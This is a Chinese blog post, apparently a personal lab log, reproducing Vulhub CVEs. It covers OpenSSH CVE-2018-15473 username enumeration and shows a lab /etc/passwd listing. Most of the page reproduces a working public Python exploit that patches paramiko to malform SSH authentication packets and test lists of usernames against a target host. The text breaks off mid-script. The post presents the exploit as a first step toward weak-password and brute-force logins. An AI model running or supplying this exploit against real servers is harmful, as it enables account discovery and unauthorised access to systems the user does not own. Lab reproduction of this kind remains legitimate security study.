<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png?v=2.6.2" sizes="180x180"><link rel="mask-icon" href="/images/icons/stun-logo.svg?v=2.6.2" color="#54bcff"><meta name="msapplication-TileImage" content="/images/icons/favicon-144x144.png"><meta name="msapplication-TileColor" content="#000000"><meta name="baidu-site-verification" content="code-15zD58SrOe"><meta name="description" content="CVE       在Vulhub上面的CVE复现，一份小记录                     OpenSSH                           CVE-2018-15473       漏洞内容：在OpenSSH 7.7前存在一个用户名枚举漏洞，通过该漏洞，可以判断某个用户名是否存在于目标主机中 漏洞作用：我们用弱口令、爆破等方式">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE">
<meta property="og:url" content="http://jlan.darkflow.top/posts/67caa546.html">
<meta property="og:site_name" content="J1an&#39;s Little World">
<meta property="og:description" content="CVE       在Vulhub上面的CVE复现，一份小记录                     OpenSSH                           CVE-2018-15473       漏洞内容：在OpenSSH 7.7前存在一个用户名枚举漏洞，通过该漏洞，可以判断某个用户名是否存在于目标主机中 漏洞作用：我们用弱口令、爆破等方式">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206171757123.png">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202208101616840.png">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202209010033494.png">
<meta property="og:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202209010034597.png">
<meta property="article:published_time" content="2022-06-17T09:30:44.000Z">
<meta property="article:modified_time" content="2022-08-31T16:34:51.783Z">
<meta property="article:author" content="J1an">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206171757123.png"><title>CVE | J1an's Little World</title><link ref="canonical" href="http://jlan.darkflow.top/posts/67caa546.html"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"dark","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: {"avoidBanner":false},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="J1an's Little World" type="application/atom+xml">
</head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/friends/"><span class="header-nav-menu-item__icon"><i class="fas fa-user-friends"></i></span><span class="header-nav-menu-item__text">友链</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">J1an's Little World</div><div class="header-banner-info__subtitle">欢迎来学习知识</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">CVE</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2022-06-17</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2022-09-01</span></span><span class="post-meta-item post-meta-item--visitors leancloud_visitors" id="/posts/67caa546.html" data-flag-title="CVE"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value leancloud-visitors-count"></span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body">
        <h1 id="CVE"   >
          <a href="#CVE" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE" class="headerlink" title="CVE"></a>CVE</h1>
      <p>在Vulhub上面的CVE复现，一份小记录</p>

        <h2 id="OpenSSH"   >
          <a href="#OpenSSH" class="heading-link"><i class="fas fa-link"></i></a><a href="#OpenSSH" class="headerlink" title="OpenSSH"></a>OpenSSH</h2>
      
        <h3 id="CVE-2018-15473"   >
          <a href="#CVE-2018-15473" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2018-15473" class="headerlink" title="CVE-2018-15473"></a>CVE-2018-15473</h3>
      <p>漏洞内容：在OpenSSH 7.7前存在一个用户名枚举漏洞，通过该漏洞，可以判断某个用户名是否存在于目标主机中</p>
<p>漏洞作用：我们用弱口令、爆破等方式进行尝试登录时，ssh需要的用户名和账户名不管是一致还是不一致，都会给我们一个登录延迟的假象，让我们以为可以登录成功，实则不管你的用户名是否是正确的，它都会让你输入密码，然后告诉你登录失败，因此我们必须知道对方用户准确的用户名，让我们在接下来不管是弱口令登录还是暴力破解方面都很有帮助</p>
<p>利用条件：OpenSSH 版本&lt;7.7</p>
<p>漏洞复现：</p>
<ol>
<li><p>进入docker更改密码，此处改为<code>123456</code></p>
</li>
<li><p>ssh连接docker，查看<code>/etc/passwd</code>文件来查看用户名</p>
<pre class="line-numbers language-none"><code class="language-none">daemon:x:1:1:daemon:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;sbin&#x2F;nologin
bin:x:2:2:bin:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin
sys:x:3:3:sys:&#x2F;dev:&#x2F;usr&#x2F;sbin&#x2F;nologin
sync:x:4:65534:sync:&#x2F;bin:&#x2F;bin&#x2F;sync
games:x:5:60:games:&#x2F;usr&#x2F;games:&#x2F;usr&#x2F;sbin&#x2F;nologin
man:x:6:12:man:&#x2F;var&#x2F;cache&#x2F;man:&#x2F;usr&#x2F;sbin&#x2F;nologin
lp:x:7:7:lp:&#x2F;var&#x2F;spool&#x2F;lpd:&#x2F;usr&#x2F;sbin&#x2F;nologin
mail:x:8:8:mail:&#x2F;var&#x2F;mail:&#x2F;usr&#x2F;sbin&#x2F;nologin
news:x:9:9:news:&#x2F;var&#x2F;spool&#x2F;news:&#x2F;usr&#x2F;sbin&#x2F;nologin
uucp:x:10:10:uucp:&#x2F;var&#x2F;spool&#x2F;uucp:&#x2F;usr&#x2F;sbin&#x2F;nologin
proxy:x:13:13:proxy:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin
www-data:x:33:33:www-data:&#x2F;var&#x2F;www:&#x2F;usr&#x2F;sbin&#x2F;nologin
backup:x:34:34:backup:&#x2F;var&#x2F;backups:&#x2F;usr&#x2F;sbin&#x2F;nologin
list:x:38:38:Mailing List Manager:&#x2F;var&#x2F;list:&#x2F;usr&#x2F;sbin&#x2F;nologin
irc:x:39:39:ircd:&#x2F;var&#x2F;run&#x2F;ircd:&#x2F;usr&#x2F;sbin&#x2F;nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):&#x2F;var&#x2F;lib&#x2F;gnats:&#x2F;usr&#x2F;sbin&#x2F;nologin
nobody:x:65534:65534:nobody:&#x2F;nonexistent:&#x2F;usr&#x2F;sbin&#x2F;nologin
_apt:x:100:65534::&#x2F;nonexistent:&#x2F;bin&#x2F;false
sshd:x:74:74:Privilege-separated SSH:&#x2F;usr&#x2F;local&#x2F;sbin&#x2F;sshd:&#x2F;sbin&#x2F;nologin
vulhub:x:1000:1000:,,,:&#x2F;home&#x2F;vulhub:&#x2F;bin&#x2F;bash
example:x:1001:1001:,,,:&#x2F;home&#x2F;example:&#x2F;bin&#x2F;bash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></li>
<li><p>测试exp</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/env python</span>
<span class="token comment"># python2 exp.py --port SSH端口 --userList 用户名字典 IP</span>
<span class="token comment">###########################################################################</span>
<span class="token comment">#                ____                    _____ _____ _    _               #</span>
<span class="token comment">#               / __ \                  / ____/ ____| |  | |              #</span>
<span class="token comment">#              | |  | |_ __   ___ _ __ | (___| (___ | |__| |              #</span>
<span class="token comment">#              | |  | | '_ \ / _ \ '_ \ \___ \\___ \|  __  |              #</span>
<span class="token comment">#              | |__| | |_) |  __/ | | |____) |___) | |  | |              #</span>
<span class="token comment">#               \____/| .__/ \___|_| |_|_____/_____/|_|  |_|              #</span>
<span class="token comment">#                     | |               Username Enumeration              #</span>
<span class="token comment">#                     |_|                                                 #</span>
<span class="token comment">#                                                                         #</span>
<span class="token comment">###########################################################################</span>
<span class="token comment"># Exploit: OpenSSH Username Enumeration Exploit (CVE-2018-15473)          #</span>
<span class="token comment"># Vulnerability: CVE-2018-15473                                           #</span>
<span class="token comment"># Affected Versions: OpenSSH version &lt; 7.7                                #</span>
<span class="token comment"># Author: Justin Gardner, Penetration Tester @ SynerComm AssureIT         #</span>
<span class="token comment"># Github: https://github.com/Rhynorater/CVE-2018-15473-Exploit            #</span>
<span class="token comment"># Email: Justin.Gardner@SynerComm.com                                     #</span>
<span class="token comment"># Date: August 20, 2018                                                   #</span>
<span class="token comment">###########################################################################</span>

<span class="token keyword">import</span> argparse
<span class="token keyword">import</span> logging
<span class="token keyword">import</span> paramiko
<span class="token keyword">import</span> multiprocessing
<span class="token keyword">import</span> socket
<span class="token keyword">import</span> string
<span class="token keyword">import</span> sys
<span class="token keyword">import</span> json
<span class="token keyword">from</span> random <span class="token keyword">import</span> randint <span class="token keyword">as</span> rand
<span class="token keyword">from</span> random <span class="token keyword">import</span> choice <span class="token keyword">as</span> choice
<span class="token comment"># store function we will overwrite to malform the packet</span>
old_parse_service_accept <span class="token operator">=</span> paramiko<span class="token punctuation">.</span>auth_handler<span class="token punctuation">.</span>AuthHandler<span class="token punctuation">.</span>_handler_table<span class="token punctuation">[</span>paramiko<span class="token punctuation">.</span>common<span class="token punctuation">.</span>MSG_SERVICE_ACCEPT<span class="token punctuation">]</span>

<span class="token comment"># list to store 3 random usernames (all ascii_lowercase characters); this extra step is added to check the target</span>
<span class="token comment"># with these 3 random usernames (there is an almost 0 possibility that they can be real ones)</span>
random_username_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
<span class="token comment"># populate the list</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    user <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>choice<span class="token punctuation">(</span>string<span class="token punctuation">.</span>ascii_lowercase<span class="token punctuation">)</span> <span class="token keyword">for</span> x <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>rand<span class="token punctuation">(</span><span class="token number">15</span><span class="token punctuation">,</span> <span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    random_username_list<span class="token punctuation">.</span>append<span class="token punctuation">(</span>user<span class="token punctuation">)</span>

<span class="token comment"># create custom exception</span>
<span class="token keyword">class</span> <span class="token class-name">BadUsername</span><span class="token punctuation">(</span>Exception<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">pass</span>

<span class="token comment"># create malicious "add_boolean" function to malform packet</span>
<span class="token keyword">def</span> <span class="token function">add_boolean</span><span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token operator">**</span>kwargs<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">pass</span>

<span class="token comment"># create function to call when username was invalid</span>
<span class="token keyword">def</span> <span class="token function">call_error</span><span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token operator">**</span>kwargs<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">raise</span> BadUsername<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token comment"># create the malicious function to overwrite MSG_SERVICE_ACCEPT handler</span>
<span class="token keyword">def</span> <span class="token function">malform_packet</span><span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token operator">**</span>kwargs<span class="token punctuation">)</span><span class="token punctuation">:</span>
    old_add_boolean <span class="token operator">=</span> paramiko<span class="token punctuation">.</span>message<span class="token punctuation">.</span>Message<span class="token punctuation">.</span>add_boolean
    paramiko<span class="token punctuation">.</span>message<span class="token punctuation">.</span>Message<span class="token punctuation">.</span>add_boolean <span class="token operator">=</span> add_boolean
    result  <span class="token operator">=</span> old_parse_service_accept<span class="token punctuation">(</span><span class="token operator">*</span>args<span class="token punctuation">,</span> <span class="token operator">**</span>kwargs<span class="token punctuation">)</span>
    <span class="token comment">#return old add_boolean function so start_client will work again</span>
    paramiko<span class="token punctuation">.</span>message<span class="token punctuation">.</span>Message<span class="token punctuation">.</span>add_boolean <span class="token operator">=</span> old_add_boolean
    <span class="token keyword">return</span> result

<span class="token comment"># create function to perform authentication with malformed packet and desired username</span>
<span class="token keyword">def</span> <span class="token function">checkUsername</span><span class="token punctuation">(</span>username<span class="token punctuation">,</span> tried<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    sock <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span><span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span>args<span class="token punctuation">.</span>hostname<span class="token punctuation">,</span> args<span class="token punctuation">.</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment"># instantiate transport</span>
    transport <span class="token operator">=</span> paramiko<span class="token punctuation">.</span>transport<span class="token punctuation">.</span>Transport<span class="token punctuation">(</span>sock<span class="token punctuation">)</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        transport<span class="token punctuation">.</span>start_client<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> paramiko<span class="token punctuation">.</span>ssh_exception<span class="token punctuation">.</span>SSHException<span class="token punctuation">:</span>
        <span class="token comment"># server was likely flooded, retry up to 3 times</span>
        transport<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> tried <span class="token operator">&lt;</span> <span class="token number">4</span><span class="token punctuation">:</span>
            tried <span class="token operator">+=</span> <span class="token number">1</span>
            <span class="token keyword">return</span> checkUsername<span class="token punctuation">(</span>username<span class="token punctuation">,</span> tried<span class="token punctuation">)</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'[-] Failed to negotiate SSH transport'</span><span class="token punctuation">)</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        transport<span class="token punctuation">.</span>auth_publickey<span class="token punctuation">(</span>username<span class="token punctuation">,</span> paramiko<span class="token punctuation">.</span>RSAKey<span class="token punctuation">.</span>generate<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> BadUsername<span class="token punctuation">:</span>
            <span class="token keyword">return</span> <span class="token punctuation">(</span>username<span class="token punctuation">,</span> <span class="token boolean">False</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> paramiko<span class="token punctuation">.</span>ssh_exception<span class="token punctuation">.</span>AuthenticationException<span class="token punctuation">:</span>
            <span class="token keyword">return</span> <span class="token punctuation">(</span>username<span class="token punctuation">,</span> <span class="token boolean">True</span><span class="token punctuation">)</span>
    <span class="token comment">#Successful auth(?)</span>
    <span class="token keyword">raise</span> Exception<span class="token punctuation">(</span><span class="token string">"There was an error. Is this the correct version of OpenSSH?"</span><span class="token punctuation">)</span>

<span class="token comment"># function to test target system using the randomly generated usernames</span>
<span class="token keyword">def</span> <span class="token function">checkVulnerable</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    vulnerable <span class="token operator">=</span> <span class="token boolean">True</span>
    <span class="token keyword">for</span> user <span class="token keyword">in</span> random_username_list<span class="token punctuation">:</span>
        result <span class="token operator">=</span> checkUsername<span class="token punctuation">(</span>user<span class="token punctuation">)</span>
        <span class="token keyword">if</span> result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            vulnerable <span class="token operator">=</span> <span class="token boolean">False</span>
    <span class="token keyword">return</span> vulnerable

<span class="token keyword">def</span> <span class="token function">exportJSON</span><span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">:</span>
    data <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token string">"Valid"</span><span class="token punctuation">:</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string">"Invalid"</span><span class="token punctuation">:</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span>
    <span class="token keyword">for</span> result <span class="token keyword">in</span> results<span class="token punctuation">:</span>
        <span class="token keyword">if</span> result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token keyword">and</span> result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token keyword">not</span> <span class="token keyword">in</span> data<span class="token punctuation">[</span><span class="token string">'Valid'</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            data<span class="token punctuation">[</span><span class="token string">'Valid'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>append<span class="token punctuation">(</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token keyword">elif</span> <span class="token keyword">not</span> result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token keyword">and</span> result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token keyword">not</span> <span class="token keyword">in</span> data<span class="token punctuation">[</span><span class="token string">'Invalid'</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            data<span class="token punctuation">[</span><span class="token string">'Invalid'</span><span class="token punctuation">]</span><span class="token punctuation">.</span>append<span class="token punctuation">(</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>data<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">exportCSV</span><span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">:</span>
    final <span class="token operator">=</span> <span class="token string">"Username, Valid\n"</span>
    <span class="token keyword">for</span> result <span class="token keyword">in</span> results<span class="token punctuation">:</span>
        final <span class="token operator">+=</span> result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">", "</span><span class="token operator">+</span><span class="token builtin">str</span><span class="token punctuation">(</span>result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">"\n"</span>
    <span class="token keyword">return</span> final

<span class="token keyword">def</span> <span class="token function">exportList</span><span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">:</span>
    final <span class="token operator">=</span> <span class="token string">""</span>
    <span class="token keyword">for</span> result <span class="token keyword">in</span> results<span class="token punctuation">:</span>
        <span class="token keyword">if</span> result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            final<span class="token operator">+=</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">" is a valid user!\n"</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            final<span class="token operator">+=</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">" is not a valid user!\n"</span>
    <span class="token keyword">return</span> final

<span class="token comment"># assign functions to respective handlers</span>
paramiko<span class="token punctuation">.</span>auth_handler<span class="token punctuation">.</span>AuthHandler<span class="token punctuation">.</span>_handler_table<span class="token punctuation">[</span>paramiko<span class="token punctuation">.</span>common<span class="token punctuation">.</span>MSG_SERVICE_ACCEPT<span class="token punctuation">]</span> <span class="token operator">=</span> malform_packet
paramiko<span class="token punctuation">.</span>auth_handler<span class="token punctuation">.</span>AuthHandler<span class="token punctuation">.</span>_handler_table<span class="token punctuation">[</span>paramiko<span class="token punctuation">.</span>common<span class="token punctuation">.</span>MSG_USERAUTH_FAILURE<span class="token punctuation">]</span> <span class="token operator">=</span> call_error

<span class="token comment"># get rid of paramiko logging</span>
logging<span class="token punctuation">.</span>getLogger<span class="token punctuation">(</span><span class="token string">'paramiko.transport'</span><span class="token punctuation">)</span><span class="token punctuation">.</span>addHandler<span class="token punctuation">(</span>logging<span class="token punctuation">.</span>NullHandler<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

arg_parser <span class="token operator">=</span> argparse<span class="token punctuation">.</span>ArgumentParser<span class="token punctuation">(</span><span class="token punctuation">)</span>
arg_parser<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'hostname'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">str</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The target hostname or ip address"</span><span class="token punctuation">)</span>
arg_parser<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--port'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">,</span> default<span class="token operator">=</span><span class="token number">22</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The target port"</span><span class="token punctuation">)</span>
arg_parser<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--threads'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">,</span> default<span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The number of threads to be used"</span><span class="token punctuation">)</span>
arg_parser<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--outputFile'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">str</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The output file location"</span><span class="token punctuation">)</span>
arg_parser<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--outputFormat'</span><span class="token punctuation">,</span> choices<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">'list'</span><span class="token punctuation">,</span> <span class="token string">'json'</span><span class="token punctuation">,</span> <span class="token string">'csv'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> default<span class="token operator">=</span><span class="token string">'list'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">str</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The output file location"</span><span class="token punctuation">)</span>
group <span class="token operator">=</span> arg_parser<span class="token punctuation">.</span>add_mutually_exclusive_group<span class="token punctuation">(</span>required<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span>
group<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--username'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">str</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The single username to validate"</span><span class="token punctuation">)</span>
group<span class="token punctuation">.</span>add_argument<span class="token punctuation">(</span><span class="token string">'--userList'</span><span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token operator">=</span><span class="token builtin">str</span><span class="token punctuation">,</span> <span class="token builtin">help</span><span class="token operator">=</span><span class="token string">"The list of usernames (one per line) to enumerate through"</span><span class="token punctuation">)</span>
args <span class="token operator">=</span> arg_parser<span class="token punctuation">.</span>parse_args<span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    sock <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        sock<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span>args<span class="token punctuation">.</span>hostname<span class="token punctuation">,</span> args<span class="token punctuation">.</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span>
        sock<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> socket<span class="token punctuation">.</span>error<span class="token punctuation">:</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'[-] Connecting to host failed. Please check the specified host and port.'</span><span class="token punctuation">)</span>
        sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

    <span class="token comment"># first we run the function to check if host is vulnerable to this CVE</span>
    <span class="token keyword">if</span> <span class="token keyword">not</span> checkVulnerable<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token comment"># most probably the target host is either patched or running a version not affected by this CVE</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Target host most probably is not vulnerable or already patched, exiting..."</span><span class="token punctuation">)</span>
        sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
    <span class="token keyword">elif</span> args<span class="token punctuation">.</span>username<span class="token punctuation">:</span> <span class="token comment">#single username passed in</span>
        result <span class="token operator">=</span> checkUsername<span class="token punctuation">(</span>args<span class="token punctuation">.</span>username<span class="token punctuation">)</span>
        <span class="token keyword">if</span> result<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">" is a valid user!"</span><span class="token punctuation">)</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">+</span><span class="token string">" is not a valid user!"</span><span class="token punctuation">)</span>
    <span class="token keyword">elif</span> args<span class="token punctuation">.</span>userList<span class="token punctuation">:</span> <span class="token comment">#username list passed in</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            f <span class="token operator">=</span> <span class="token builtin">open</span><span class="token punctuation">(</span>args<span class="token punctuation">.</span>userList<span class="token punctuation">)</span>
        <span class="token keyword">except</span> IOError<span class="token punctuation">:</span>
